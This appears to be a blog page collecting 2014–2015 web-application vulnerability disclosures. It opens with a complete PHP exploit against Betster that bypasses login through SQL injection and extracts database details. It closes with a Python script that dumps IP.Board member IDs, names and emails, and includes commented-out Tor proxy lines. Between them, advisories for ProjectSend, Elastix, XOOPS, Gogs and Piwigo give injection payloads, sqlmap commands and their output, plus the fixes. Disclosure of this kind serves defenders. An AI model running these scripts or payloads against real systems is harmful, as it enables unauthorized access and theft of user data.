MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

9Mar/150

Betster (PHP Betoffice) Authentication Bypass and SQL Injection

<?php
/*
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /        
  / XXXXXX /
 (________(          
  `------'
 
 Exploit Title   : Betster (PHP Betoffice) Authentication Bypass and SQL Injection
 Date            : 6 March 2015
 Exploit Author  : CWH Underground
 Discovered By   : ZeQ3uL
 Site            : www.2600.in.th
 Vendor Homepage : http://betster.sourceforge.net/
 Software Link   : http://downloads.sourceforge.net/project/betster/betster-1.0.4.zip
 Version         : 1.0.4
 Tested on       : Linux, PHP 5.3.9
 
####################
SOFTWARE DESCRIPTION
####################
 
Betster is a Software to create a online bet-office based on PHP, MySQL and JavaScript. The system works with variable 
odds 
(betting-exchange with variable decimal odds) and provides a CMS-like backend for handling the bets, users and 
categories.
 
################################################################
VULNERABILITY: SQL Injection (showprofile.php, categoryedit.php)
################################################################
 
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system 
(DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the 
underlying operating system
depending on the query, DBMS and configuration.
 
/showprofile.php (LINE: 63)
-----------------------------------------------------------------------------
if (($session->getState()) && 
        (($user->getStatus() == "administrator") || 
         ($user->getStatus() == "betmaster"))){
        $mainhtml = file_get_contents("tpl/showprofile.inc");
 
        $id = htmlspecialchars($_GET['id']);                            <<<< WTF !!
        $xuser = $db_mapper->getUserById($id);
-----------------------------------------------------------------------------
 
/categoryedit.php (LINE: 52)
-----------------------------------------------------------------------------
$id = htmlspecialchars($_GET['id']);                                    <<<< WTF !!
$action = htmlspecialchars($_GET['ac']);
----------------------------------------------------------------------------- 
 
###########################################
VULNERABILITY: Authentication Bypass (SQLi)
###########################################
 
File index.php (Login function) has SQL Injection vulnerability, "username" parameter supplied in POST parameter for 
checking valid credentials.
The "username" parameter is not validated before passing into SQL query which arise authentication bypass issue.
 
#####################################################
EXPLOIT
#####################################################
 
*/
 
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 50);
 
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
 
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
 
print "\n+---------------------------------------------+";
print "\n| Betster Auth Bypass & SQL Injection Exploit |";
print "\n+---------------------------------------------+\n";
 
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /betster/\n";
    die();
}
 
$host = $argv[1];
$path = $argv[2];
 
$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN";
 
$packet  = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
 
   print "\n  ,--^----------,--------,-----,-------^--,   \n";
   print "  | |||||||||   `--------'     |          O   \n";
   print "  `+---------------------------^----------|   \n";
   print "    `\_,-------, _________________________|   \n";
   print "      / XXXXXX /`|     /                      \n";
   print "     / XXXXXX /  `\   /                       \n";
   print "    / XXXXXX /\______(                        \n";
   print "   / XXXXXX /                                 \n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
   print " (________(                                   \n";
   print "  `------'                                    \n";
 
$response = http_send($host, $packet);
 
 if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
 
$packet  = "POST {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
 
   print "\n\n[+] Bypassing Authentication...\n";
   sleep(2);
 
$response=http_send($host, $packet);
 
preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] 
Bypass Authentication Failed !!\n");
 
$packet  = "GET 
{$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+
 HTTP/1.0\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
 
   print "[+] Performing SQL Injection Attack\n";
   sleep(2);
 
$response1=http_send($host, $packet);
 
preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n");
 
################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>

(316)

7Mar/150

ProjectSend r561 SQL Injection

#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/download/67/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn)
 
 
::PROOF OF CONCEPT::
 
+ REQUEST:
GET /projectsend/users-edit.php?id=<SQL INJECTION HERE> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456;
PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
Connection: keep-alive
 
 
- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code: 
if (isset($_GET['id'])) {
  $client_id = mysql_real_escape_string($_GET['id']);
  /**
   * Check if the id corresponds to a real client.
   * Return 1 if true, 2 if false.
   **/
  $page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
  /**
   * Return 0 if the id is not set.
   */
  $page_status = 0;
}
 
/**
 * Get the clients information from the database to use on the form.
 */
if ($page_status === 1) {
  $editing = $database->query("SELECT * FROM tbl_users WHERE
id=$client_id");
  while($data = mysql_fetch_array($editing)) {
    $add_client_data_name = $data['name'];
    $add_client_data_user = $data['user'];
    $add_client_data_email = $data['email'];
    $add_client_data_addr = $data['address'];
    $add_client_data_phone = $data['phone'];
    $add_client_data_intcont = $data['contact'];
    if ($data['notify'] == 1) { $add_client_data_notity = 1; }
else { $add_client_data_notity = 0; }
    if ($data['active'] == 1) { $add_client_data_active = 1; }
else { $add_client_data_active = 0; }
  }
}
 
 
::DISCLOSURE::
+ 01/06/2015: Detect vulnerability
+ 01/07/2015: Contact to vendor
+ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
+ 03/05/2015: Public information
 
::REFERENCE::
-
http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in-projectsend-r561-76.html
 
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
 
Best Regards,
---------------------------------------------------------------------
ITAS Team (www.itas.vn)

(284)

7Mar/150

Elastix 2.5.0 SQL Injection

# Title: Elastix v2.x Blind SQL Injection Vulnerability
# Author: Ahmed Aboul-Ela
# Twitter: https://twitter.com/aboul3la
# Vendor : http://www.elastix.org
# Version: v2.5.0 and prior versions should be affected too
 
- Vulnerable Source Code snippet in "a2billing/customer/iridium_threed.php":
 
  <?php
  [...]
  line 5: getpost_ifset (array('transactionID', 'sess_id', 'key', 'mc_currency', 'currency', 'md5sig', 
  'merchant_id', 'mb_amount', 'status','mb_currency','transaction_id', 'mc_fee', 'card_number'));
 
  line 34: $QUERY = "SELECT id, cardid, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires, 
  creationdate, status, cvv, credit_card_type,currency, item_id, item_type " . 
  " FROM cc_epayment_log " . " WHERE id = ".$transactionID;
 
  line 37: $transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
  [...]
  ?>    
 
   The GET parameter transactionID was used directly in the SQL query 
   without any sanitization which lead directly to SQL Injection vulnerability.
 
- Proof of Concept: 
 
  http://[host]/a2billing/customer/iridium_threed.php?transactionID=-1 and 1=benchmark(2000000,md5(1))
 
  The backend response will delay for few seconds, which means the benchmark() function was executed successfully
 
- Mitigation:
 
   The vendor has released a fix for the vulnerability. It is strongly recommended to update your elastix server now
 
   [~] yum update elastix-a2billing
 
 
- Time-Line:
 
    Sat, Feb 14, 2015 at 2:19 PM: Vulnerability report sent to Elastix
    Wed, Feb 18, 2015 at 4:29 PM: Confirmation of the issue from Elastix
    Fri, Mar  6, 2015 at 8:39 PM: Elastix released a fix for the vulnerability
    Sat, Mar  7, 2015 at 5:15 PM: The public responsible disclosure
 
- Credits:
 
    Ahmed Aboul-Ela - Cyber Security Analyst @ EG-CERT

(348)

18Nov/140

XOOPS 2.5.6 SQL Injection

=============================================
MGC ALERT 2014-003
- Original release date: March 6, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in XOOPS <= 2.5.6
 
II. BACKGROUND
-------------------------
XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though
started as a portal system, it later developed into a web application
framework. It aims to serve as a web framework for use by small, medium and
large sites, through the installation of modules.
 
III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variable "selgroups" on the page
"admin.php". This bug was found using the portal with authentication. To
exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
 
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
Blind SQL injection.
 
/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1
 
Exploiting with SQLMap:
 
python sqlmap.py -u "
http://192.168.244.129/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1"
--cookie="PHPSESSID=kjrjempn828cgrv6k8tjp4fs60;xoops_user=0"  -p
"selgroups" --technique=TB --dbs
 
[INFO] POST parameter 'selgroups' is 'MySQL > 5.0.11 AND time-based blind
(comment)' injectable
[INFO] POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or
HAVING clause (MySQL comment)' injectable
 
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 4
[INFO] resumed: information_schema
[INFO] resumed: mysql
[INFO] resumed: phpmyadmin
[INFO] resumed: xoops
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] xoops
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
XOOPS <= 2.5.6
 
VII. SOLUTION
-------------------------
Update to version 2.5.7
 
VIII. REFERENCES
-------------------------
http://xoops.org/
http://xoops.org/modules/news/article.php?storyid=6658
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: New version that includes patched code
http://xoops.org/modules/news/article.php?storyid=6658
November 18, 2014 4: Sent to lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

(950)

16Nov/140

Gogs Repository Search SQL Injection

Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])
 
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.
 
Gogs provides an api view to give javascript code the possibility to
search for
existing repositories in the system. This view is accessible at
/api/v1/repos/search?q=<search query>.
 
The q Parameter of this view is vulnerable to SQL injection.
 
 
Exploitation Technique
======================
Remote
 
 
Severity Level
==============
Critical
 
 
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8682
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/repo.go:
[...]
// SearchRepositoryByName returns given number of repositories whose name
contains keyword.
func SearchRepositoryByName(opt SearchOption) (repos []*Repository, err
error) {
    // Prevent SQL inject.
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return repos, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)
 
    repos = make([]*Repository, 0, opt.Limit)
 
    // Append conditions.
    sess := x.Limit(opt.Limit)
    if opt.Uid > 0 {
        sess.Where("owner_id=?", opt.Uid)
    }
    if !opt.Private {
        sess.And("is_private=false")
    }
    sess.And("lower_name like '%" + opt.Keyword + "%'").Find(&repos)
    return repos, err
}
[...]
 
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.
 
 
Proof of Concept
================
Request:
http://www.example.com/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09
(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09
user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)
%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09
as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as
%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09
a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09
JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN
%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN
%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN
%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN
%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN
%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
 
Response:
{"data":[{"repolink":"bluec0re/test"},{"repolink":"bluec0re/secret"},{"repolink"
:"bluec0re/root@localhost"}],"ok":true}
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
sess.And("lower_name like ?", "%" + opt.Keyword + "%").Find(&repos)
 
Update to version 0.5.6.1105.
 
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========Update to version 0.5.6.1105.
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1402.txt
 
 
Advisory-ID
===========
BC-1402
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
 
 
 
Unauthenticated SQL Injection in Gogs user search
=================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])
 
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.
 
Gogs provides an api view to give javascript code the possibility to
search for
existing users in the system. This view is accessible at
/api/v1/users/search?q=<search query>.
 
The q Parameter of this view is vulnerable to SQL injection.
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Critical
 
 
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8682
 
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/user.go:
[...]
// SearchUserByName returns given number of users whose name contains
keyword.
func SearchUserByName(opt SearchOption) (us []*User, err error) {
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return us, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)
 
    us = make([]*User, 0, opt.Limit)
    err = x.Limit(opt.Limit).Where("type=0").And("lower_name like '%" +
opt.Keyword + "%'").Find(&us)
    return us, err
}
[...]
 
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.
 
 
Proof of Concept
================
Request:
http://www.example.com/api/v1/users/search?q='/**/and/**/false)/**/union/**/
select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from
/**/mysql.db/**/where/**/('%25'%3D'
 
Response:
{"data":[{"username":"5.5.40-0ubuntu0.14.04.1","avatar":
"//1.gravatar.com/avatar/"}],"ok":true}
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
err = x.Limit(opt.Limit).Where("type=0").And("lower_name like ?", "%" +
opt.Keyword + "%").Find(&us)
 
Update to version 0.5.6.1105.
 
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1403.txt
 
 
Advisory-ID
===========
BC-1403
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
 
 
- -- 
Timo Schmid
 
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
 
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
 
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================

(529)

15Nov/140

Gogs Label Search Blind SQL Injection

 
Blind SQL Injection in Gogs label search
========================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])
 
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.
 
Gogs provides a view to filter issues by labels. This view is accessible at
/<username>/<repository>/issues?labels=&type=&state=
 
The labels Parameter of this view is vulnerable to a blind SQL injection.
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Critical
 
 
CVSS Base Score
===============
6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8681
 
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/issue.go:
[...]
// GetIssues returns a list of issues by given conditions.
func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds,
sortType string) ([]Issue, error) {
    sess := x.Limit(20, (page-1)*20)
 
    if rid > 0 {
        sess.Where("repo_id=?", rid).And("is_closed=?", isClosed)
    } else {
        sess.Where("is_closed=?", isClosed)
    }
 
    if uid > 0 {
        sess.And("assignee_id=?", uid)
    } else if pid > 0 {
        sess.And("poster_id=?", pid)
    }
 
    if mid > 0 {
        sess.And("milestone_id=?", mid)
    }
 
    if len(labelIds) > 0 {
        for _, label := range strings.Split(labelIds, ",") {
            sess.And("label_ids like '%$" + label + "|%'")
        }
    }
[...]
 
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. A attacker is restricted to not use commas in the
injection
string as the program splits input at commas.
 
 
Proof of Concept
================
Test of version string contains at least 10 characters:
http://www.example.com/user/repos/issues?label=' or
char_length(@@version) > 10
and '|%'='&type=all&state=
 
Returns all issues if true, non if false.
 
This could be used to extract data with a binary search.
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
sess.And("label_ids like ?", "%$" + label + "|%")
 
Update to Version 0.5.6.1025.
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1024-gf1d8746
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-10-25: Fixed by ensuring datatype of user input
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1401.txt
 
 
Advisory-ID
===========
BC-1401
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
 
- -- 
Timo Schmid
 
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
 
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
 
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================

(484)

14Nov/140

Piwigo <= v2.6.0 – Blind SQL Injection

=============================================
MGC ALERT 2014-001
- Original release date: January 12, 2014
- Last revised:  November 12, 2014
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in Piwigo <= v2.6.0
 
II. BACKGROUND
-------------------------
Piwigo is a web application management photo albums, available under the License GPL.
Is written in PHP and requires a MySQL, PostgreSQL or SQLite data.
 
III. DESCRIPTION
-------------------------
This bug was found using the portal without authentication. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.
It is possible to inject SQL code in the variable "rate" on the page "picture.php".
 
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from Blind SQL injection.
 
/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)
 
Exploiting with SQLMap:
 
python sqlmap.py -u "http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate"; --data
"rate=1" --dbs
 
[16:32:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[16:32:25] [INFO] fetching database names
[16:32:25] [INFO] fetching number of databases
[16:32:25] [INFO] resumed: 4
[16:32:25] [INFO] resumed: information_schema
[16:32:25] [INFO] resumed: mysql
[16:32:25] [INFO] resumed: phpmyadmin
[16:32:25] [INFO] resumed: piwigo
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] piwigo
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. 
Client systems can also be targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
Piwigo <= v2.6.0
 
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,before making any kind of transaction with them must be validated.
 
VIII. REFERENCES
-------------------------
http://www.piwigo.org
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
 
XI. DISCLOSURE TIMELINE
-------------------------
January 21, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas November 12, 2014 2: Send to the Full-Disclosure lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

(1779)

11Nov/140

IP.Board 3.4.7 SQL Injection

#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based); 
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
 
url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
 
import sys, re
 
# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>
 
import urllib2, urllib
 
def inject(sql):
  try:
    urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
  except urllib2.HTTPError, e:
    if e.code == 503:
      data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
      txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
      if txt is not None: 
        return txt.group(1)
      sys.exit('Error [3], received unexpected data:\n%s' % data)
    sys.exit('Error [1]')
  sys.exit('Error [2]')
 
def get(name, table, num):
  sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
  s = int(inject('LENGTH((%s))' % sqli))
  if s < 31:
    return inject(sqli)
  else:
    r = ''
    for i in range(1, s+1, 31):
      r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
    return r
 
n = inject('SELECT COUNT(*) FROM members')
print '* Found %s users' % n
for j in range(int(n)):  
  print get('member_id', 'members', j)
  print get('name', 'members', j)
  print get('email', 'members', j)
